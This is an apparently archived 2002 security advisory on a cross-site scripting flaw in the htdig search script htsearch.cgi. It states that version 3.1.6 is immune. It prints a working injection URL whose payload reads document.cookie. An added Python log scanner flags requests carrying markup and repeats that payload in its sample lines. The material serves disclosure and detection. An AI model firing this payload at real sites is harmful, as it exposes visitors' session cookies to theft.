htdig cross site scripting bug
27th Jun 2002 [SBWID-5490]
COMMAND

	htdig cross site scripting bug

SYSTEMS AFFECTED

	htdig all releases up to 3.1.5 ??

PROBLEM

	Howard Yeend found that the following request:

	http://<webserver>/cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

	will trigger the cross site scripting bug.
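
	Added example, not part of the original advisory: a log check that flags htsearch requests whose `words` value decodes to markup (including double-encoded input) and shows the value as it would look once HTML-escaped. The log lines are constructed, the function names are hypothetical, and the escaping shown is generic output encoding, not necessarily how htdig 3.1.6 fixes the bug.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line inside a Common Log Format entry: "METHOD target PROTOCOL"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Angle brackets have no place in a search term; quotes are left out
# because users legitimately type them, which would cause false positives.
MARKUP = re.compile(r"[<>]")

# Constructed sample log lines (addresses from the documentation range).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Jun/2002:10:00:00 +0000] "GET /cgi-bin/htsearch.cgi?words=backup+policy HTTP/1.0" 200 5120',
    '192.0.2.11 - - [27/Jun/2002:10:00:05 +0000] "GET /cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E HTTP/1.0" 200 4873',
    '192.0.2.12 - - [27/Jun/2002:10:00:09 +0000] "GET /cgi-bin/htsearch.cgi?words=%2522%253E%253Cb%253E HTTP/1.0" 200 4790',
    '192.0.2.13 - - [27/Jun/2002:10:00:12 +0000] "GET /index.html?words=%3Cb%3E HTTP/1.0" 200 900',
]


def suspicious_words(log_line, max_decode=3):
    """Return the decoded `words` value if it carries markup, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    if "htsearch" not in target.path:
        return None
    for value in parse_qs(target.query, keep_blank_values=True).get("words", []):
        # parse_qs has decoded once; decode again to catch double encoding.
        for _ in range(max_decode):
            if MARKUP.search(value):
                return value
            value = unquote(value)
    return None


def scan(lines):
    """Return (line number, decoded value, HTML-escaped value) per hit."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_words(line)
        if value is not None:
            # html.escape shows how the value looks once output-encoded.
            hits.append((number, value, html.escape(value, quote=True)))
    return hits


if __name__ == "__main__":
    for number, value, escaped in scan(SAMPLE_LOG):
        print(f"line {number}: {value!r} -> {escaped}")
```
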

SOLUTION

	 Update (01 July 2002)
	 ======

	Peter Watkins [http://www.tux.org/~peterw/] says version 3.1.6 is
	immune.
